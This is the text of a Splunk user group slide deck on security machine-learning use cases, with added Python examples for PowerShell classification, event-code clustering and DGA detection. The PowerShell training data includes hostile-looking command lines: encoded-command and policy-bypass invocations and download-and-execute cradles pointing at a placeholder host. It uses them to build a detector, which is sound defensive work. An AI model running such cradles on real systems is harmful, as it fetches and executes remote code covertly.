© 2023 SPLUNK INC.
Splunk User Group Reboot
March 2023
Splunk T-Shirt Company
It’s not just a Platform …. it’s a Lifestyle!!
Steering Committee
We can always use an extra hand!
User Group Guidelines
● GOAL: Create an authentic, technical forum to share ideas, use-cases and best practices
● Led by the community - This is not a Sales Forum
● Presentations should be approx. 30 mins with time for discussion
● 2 or 3 topics per meet up (helps broaden the interest)
● Discuss if we want to rotate locations (have some virtual events)
● The group can determine the frequency (at least 1 meeting per quarter)
What to Expect from this forum
Become an ACTIVE participant!
● Join the Calgary Splunk User Group
○ https://usergroups.splunk.com/calgary-splunk-user-group/
● Join the Calgary Community Hub
○ Posts, Blogs, Idea Exchange
○ https://community.splunk.com/t5/Calgary-User-Group/gh-p/CalgaryUserGroup
● Join the Calgary Slack channel
○ Easy connection
○ http://splk.it/slack
○ #calgary
A little bit of setup …. for a whole lot of valuable information
Community Resources
● Find Splunk events and seminars in your region:
https://www.splunk.com/en_us/about-us/events.html
● Leverage Splunk Community Resources:
○ Splunk Answers: Submit questions, search previous answers
○ Splunk IDEAS: Submit ideas for product enhancements or upvote existing ideas
○ https://www.splunk.com/en_us/community.html
● Check out other Splunk User Groups for interesting topics and ideas
Leverage your peers
Some Sample Topics
● XRDR (Cross Region Disaster Recovery)
● Federated Search
● Ingest Actions & Edge Processor
● Risk Based Alerting
● How Security & O11Y Align
● Building Better Dashboards
● Innovative Vertically Aligned Use Cases (Industry specific use-cases)
Please be vocal on what interests you
.CONF23 - July 17 - 20th
Las Vegas, NV
Please Complete the Survey
Help us Drive the focus and direction of this Group!
Thank You!
Building AIOps Use Cases in Splunk
March 2023
Splunk App for Data Science & Deep Learning (DSDL)
Built for Data Scientists and Splunk Users
• Code Examples: Guided model building, testing, and deployment of deep learning frameworks and other data science and machine learning examples and algorithms
• Container Management: Containers & models can be productionized for scalability & optimization of resources, e.g. CPU & GPU
• Frameworks: PyTorch, Tensorflow, SpaCy, DASK, Rapids, Spark, …
• Tools: Jupyter Lab Notebooks, Tensorboard, MLflow, Spark, GIT, …
Extensible to operationalize any use case
• Open Source: New frameworks & Python Libraries freely available for integration into DSDL via github
• Acceleration: Support for GPU accelerated data science, machine learning, deep learning or other inference pipelines
Extension for MLTK to operationalize advanced custom AI / ML use cases
Powershell Command-Line Classification
Methods:
- Count Tokenization
- Logistic regression
Technologies:
- MLTK
- Custom Pre-Trained Model Deployment
Requirements:
- Labelled dataset
Details:
- Content Page
- ESCU
Tokenization and classification could be applied to a wide range of other data sources: User-Agents? Web access logs?
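As an added example (not code from the deck, MLTK or ESCU), the following pure-Python script implements the two methods the slide lists, count tokenization and logistic regression, on a small labelled set of command lines constructed for illustration. The tokenizer, the hyper-parameters, the held-out commands and the reserved name placeholder.invalid are this example's own assumptions. It also includes the check a practitioner wants before trusting such a model in a detection: which tokens carry the weight, so that flags such as -encodedcommand rather than dataset artefacts drive the score.

```python
"""Count tokenization + logistic regression for PowerShell command-line
classification, the method the slide lists for the ESCU use case.

Added example, not code from the deck, MLTK or ESCU; pure Python so it runs
without Splunk or scikit-learn. The labelled command lines are constructed
for illustration (placeholder.invalid is a reserved, non-routable name), and
the tokenizer and hyper-parameters are this example's own choices.
"""
import math
import re
from collections import Counter

# Constructed labelled dataset: 1 = suspicious, 0 = routine administration.
LABELLED = [
    ("Get-ChildItem -Path C:\\Users -Recurse", 0),
    ("Get-Service | Where-Object Status -eq Running", 0),
    ("Import-Module ActiveDirectory; Get-ADUser -Filter *", 0),
    ("Get-EventLog -LogName System -Newest 50", 0),
    ("Test-NetConnection -ComputerName fileserver -Port 445", 0),
    ("powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand AAAA", 1),
    ("powershell -nop -w hidden -ep bypass -enc BBBB", 1),
    ("IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a')", 1),
    ("powershell -ExecutionPolicy Bypass -NonInteractive -EncodedCommand CCCC", 1),
    ("Invoke-Expression (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/b')", 1),
]

# Keep the leading dash so flags (-enc) and words (enc) stay distinct tokens.
TOKEN_RE = re.compile(r"-?[A-Za-z][A-Za-z0-9\-]*")


def tokenize(cmdline):
    """Count tokenization: lower-cased tokens -> occurrence counts."""
    return Counter(t.lower() for t in TOKEN_RE.findall(cmdline))


def build_vocab(rows):
    """Token -> column index over every token seen in the training rows."""
    tokens = sorted({t for cmd, _ in rows for t in tokenize(cmd)})
    return {tok: i for i, tok in enumerate(tokens)}


def vectorize(cmdline, vocab):
    x = [0.0] * len(vocab)
    for tok, n in tokenize(cmdline).items():
        if tok in vocab:                  # tokens unseen in training are ignored
            x[vocab[tok]] = float(n)
    return x


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def train_logreg(rows, vocab, epochs=300, lr=0.1, l2=0.01):
    """Logistic regression fitted by stochastic gradient descent with an L2 penalty."""
    weights, bias = [0.0] * len(vocab), 0.0
    data = [(vectorize(cmd, vocab), y) for cmd, y in rows]
    for _ in range(epochs):
        for x, y in data:
            err = sigmoid(sum(w * xi for w, xi in zip(weights, x)) + bias) - y
            weights = [w - lr * (err * xi + l2 * w) for w, xi in zip(weights, x)]
            bias -= lr * err
    return weights, bias


VOCAB = build_vocab(LABELLED)
MODEL = train_logreg(LABELLED, VOCAB)


def score(cmdline, model=MODEL, vocab=VOCAB):
    """Probability that a command line belongs to the suspicious class."""
    weights, bias = model
    x = vectorize(cmdline, vocab)
    return sigmoid(sum(w * xi for w, xi in zip(weights, x)) + bias)


def accuracy(rows, model=MODEL, vocab=VOCAB):
    return sum((score(c, model, vocab) >= 0.5) == bool(y) for c, y in rows) / len(rows)


def top_tokens(model=MODEL, vocab=VOCAB, n=5):
    """Tokens pushing hardest toward the suspicious class: a sanity check that
    the model learned flags and cmdlets rather than dataset artefacts."""
    weights, _ = model
    return sorted(vocab, key=lambda t: weights[vocab[t]], reverse=True)[:n]


if __name__ == "__main__":
    print("training accuracy:", accuracy(LABELLED))
    print("top suspicious tokens:", top_tokens())
    for cmd in ["powershell -nop -w hidden -ep bypass -enc DDDD",
                "Get-ChildItem -Path C:\\Temp -Filter *.log"]:
        print(f"{score(cmd):.2f}  {cmd}")
```

Ten rows are only enough to show the mechanics; a real labelled dataset (the slide's stated requirement) needs many benign admin commands per environment, otherwise every unseen cmdlet lands on whichever side of the bias the tiny sample left it. The tokenizer also deliberately keeps the leading dash, because in a detection the flag -enc and the word enc must not share a count.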
Windows Event Code Clustering + Anomaly Detection
Methods:
- Statistical Analysis
- Clustering (DBScan)
- Unsupervised
Technologies:
- MLTK
Requirements:
- Windows event code data
- Well controlled environment
Details:
- .conf21
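The slide names the method but not the mechanics, so here is an added worked example (not from the deck or from MLTK, which ships DBSCAN via scikit-learn): per-host event-code counts are log-scaled, clustered with a plain DBSCAN written out in full, and any host DBSCAN leaves as noise is reported as an anomaly together with the event code that deviates most from its peers. The host table, the event codes, eps and min_pts are constructed for this example. The slide's "well controlled environment" requirement is visible in the data: the method only works when ordinary hosts really do form tight peer groups.

```python
"""Unsupervised anomaly detection over Windows event-code counts per host:
log-scale the counts, cluster hosts with DBSCAN, and treat hosts that land in
no cluster (DBSCAN "noise") as anomalies.

Added example, not code from the deck or MLTK; pure Python so it runs
without Splunk. The per-host counts are constructed: a 24h tally of a few
Security-log event IDs. In Splunk the same table would come from a
stats count by host, EventCode search.
"""
import math

# Columns: Security-log event IDs (4624 logon, 4625 failed logon, 4634 logoff,
# 4672 special privileges assigned, 4688 process creation, 4720 account created).
EVENT_CODES = [4624, 4625, 4634, 4672, 4688, 4720]

# Constructed per-host counts: four similar workstations, three similar
# servers, and one workstation with a burst of failed logons and new accounts.
HOST_COUNTS = {
    "ws01": [52, 1, 50, 3, 120, 0],
    "ws02": [48, 2, 47, 2, 110, 0],
    "ws03": [55, 0, 54, 4, 130, 0],
    "ws04": [50, 1, 49, 3, 125, 0],
    "srv01": [400, 5, 395, 60, 40, 0],
    "srv02": [420, 4, 410, 65, 45, 0],
    "srv03": [380, 6, 375, 55, 38, 0],
    "ws09": [60, 300, 20, 3, 115, 5],
}


def log_scale(counts):
    """log(1 + n) per event code, so a 400-logon server and a 50-logon
    workstation differ by ratio rather than raw magnitude."""
    return [math.log1p(n) for n in counts]


def euclidean(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def dbscan(points, eps, min_pts):
    """Plain DBSCAN. Returns one label per point: a cluster index >= 0, or -1
    for noise. min_pts counts the point itself."""
    labels = [None] * len(points)
    cluster = 0

    def neighbours(i):
        return [j for j in range(len(points)) if euclidean(points[i], points[j]) <= eps]

    for i in range(len(points)):
        if labels[i] is not None:
            continue
        seeds = neighbours(i)
        if len(seeds) < min_pts:
            labels[i] = -1            # provisional noise; may become a border point
            continue
        labels[i] = cluster
        queue = [j for j in seeds if j != i]
        while queue:
            j = queue.pop()
            if labels[j] == -1:
                labels[j] = cluster   # border point reachable from a core point
            if labels[j] is not None:
                continue
            labels[j] = cluster
            more = neighbours(j)
            if len(more) >= min_pts:  # j is itself a core point: keep expanding
                queue.extend(more)
        cluster += 1
    return labels


def cluster_hosts(host_counts=HOST_COUNTS, eps=1.5, min_pts=3):
    """Map host -> DBSCAN label using log-scaled event-code count vectors."""
    hosts = list(host_counts)
    points = [log_scale(host_counts[h]) for h in hosts]
    return dict(zip(hosts, dbscan(points, eps, min_pts)))


def anomalous_hosts(host_counts=HOST_COUNTS, eps=1.5, min_pts=3):
    """Hosts that fit no peer group."""
    labels = cluster_hosts(host_counts, eps, min_pts)
    return sorted(h for h, lbl in labels.items() if lbl == -1)


def dominant_deviation(host, host_counts=HOST_COUNTS):
    """Event code whose log-scaled count deviates most from the median of the
    other hosts: a quick explanation of why a host was flagged."""
    others = [log_scale(v) for h, v in host_counts.items() if h != host]
    me = log_scale(host_counts[host])
    deltas = []
    for k, code in enumerate(EVENT_CODES):
        column = sorted(p[k] for p in others)
        median = column[len(column) // 2]
        deltas.append((abs(me[k] - median), code))
    return max(deltas)[1]


if __name__ == "__main__":
    print(cluster_hosts())
    for h in anomalous_hosts():
        print(f"{h}: anomalous, largest deviation in EventCode {dominant_deviation(h)}")
```

The statistical step on the slide is the scaling and the explanation, not the clustering itself: without log scaling the servers' logon volume dominates every distance, and without the per-code deviation an analyst gets a host name with no reason. eps and min_pts have to be re-tuned per environment; the values here only fit the constructed table.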
Domain Generation Algorithm Detection
Methods:
- Feature Engineering
- Text Entropy
- PCA
- Ngram Analysis
Technologies:
- MLTK/DSDL
Requirements:
- DNS Data
Details:
- DGA App - MLTK
- ESCU Content - DSDL
A very good example of an application of labelled data to a useful classifier in Splunk
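An added example (not the DGA app, ESCU content or any Splunk code) of the feature engineering the slide lists, in pure Python: Shannon entropy, digit ratio and a character-bigram likelihood trained on a constructed list of benign names, with an illustrative threshold rule standing in for the classifier that the labelled data would be used to fit. The reference list, the test domains and the thresholds are this example's assumptions. It also shows why entropy alone misleads: it grows with length, so a long benign name scores as high as a random one until the bigram likelihood is taken into account.

```python
"""Feature engineering for DGA detection over the registered label of a
domain: Shannon entropy, digit ratio and a character-bigram likelihood
learned from benign names.

Added example, not code from the deck, the MLTK DGA app or ESCU; pure
Python so it runs without Splunk. The benign reference list, the test
domains and the decision thresholds are all constructed for illustration.
"""
import math
from collections import Counter

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-"

# Constructed benign reference; in practice a large known-good list (e.g. a
# top-sites list already indexed in Splunk) would be used instead.
BENIGN_REFERENCE = [
    "google", "microsoft", "facebook", "amazon", "wikipedia", "youtube",
    "twitter", "linkedin", "github", "stackoverflow", "netflix", "apple",
    "office", "windows", "update", "cloudfront", "akamai", "mozilla",
    "splunk", "example",
]


def registered_label(domain):
    """Label directly left of the public suffix. Assumption: single-label
    suffixes only; multi-label suffixes such as co.uk need a suffix list."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(text):
    """Bits per character; 0.0 for a single repeated character."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def train_bigram_model(words):
    """Add-one-smoothed bigram transition counts over '^' + word + '$'."""
    pair_counts, first_counts = Counter(), Counter()
    for w in words:
        padded = "^" + w + "$"
        for a, b in zip(padded, padded[1:]):
            pair_counts[(a, b)] += 1
            first_counts[a] += 1
    return pair_counts, first_counts


def bigram_log_likelihood(label, model):
    """Mean log P(next char | char) under the benign model; lower means the
    character transitions look less like benign names."""
    pair_counts, first_counts = model
    vocab_size = len(ALPHABET) + 1          # the next symbol may also be '$'
    padded = "^" + label + "$"
    scores = [
        math.log((pair_counts[(a, b)] + 1) / (first_counts[a] + vocab_size))
        for a, b in zip(padded, padded[1:])
    ]
    return sum(scores) / len(scores)


BENIGN_MODEL = train_bigram_model(BENIGN_REFERENCE)


def extract_features(domain, model=BENIGN_MODEL):
    label = registered_label(domain)
    return {
        "label": label,
        "length": len(label),
        "entropy": shannon_entropy(label),
        "digit_ratio": sum(ch.isdigit() for ch in label) / max(len(label), 1),
        "bigram_loglik": bigram_log_likelihood(label, model),
    }


def is_dga_like(domain, entropy_min=2.5, loglik_max=-3.4):
    """Illustrative threshold rule (constructed, not a fitted model): with a
    labelled dataset these features would feed a classifier instead.
    Entropy alone grows with length, so a long benign word scores high; the
    bigram likelihood separates "unusual letters" from "merely long"."""
    f = extract_features(domain)
    return f["entropy"] > entropy_min and f["bigram_loglik"] < loglik_max


if __name__ == "__main__":
    for d in ["www.google.com", "xk3jq9vbz.com", "mail.stackoverflow.com"]:
        verdict = "DGA-like" if is_dga_like(d) else "benign"
        print(d, extract_features(d), verdict)
```

The slide also lists PCA: with real n-gram features (thousands of bigram and trigram columns rather than one likelihood score) PCA is the usual step that shrinks the feature matrix to a few dozen columns before the classifier is fitted. Word-like benign labels such as stackoverflow have high entropy but ordinary transitions, which is exactly the case an entropy-only rule gets wrong.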
JA3 Signature Analysis
Methods:
- One-hot Encoding
- UMAP
Technologies:
- DSDL
Requirements:
- JA3 Signature Data (Zeek)
Details:
- Blog
- Talk (Upcoming)
- DSDL Notebook
JA3 Signatures are a challenge to understand as they are very high cardinality. UMAP allows visualising a complex high-cardinality space.
Could be extended to generic behaviors? Host Classification based on CIM features?

Calgary-Splunk-User-Group-March-2023.pdf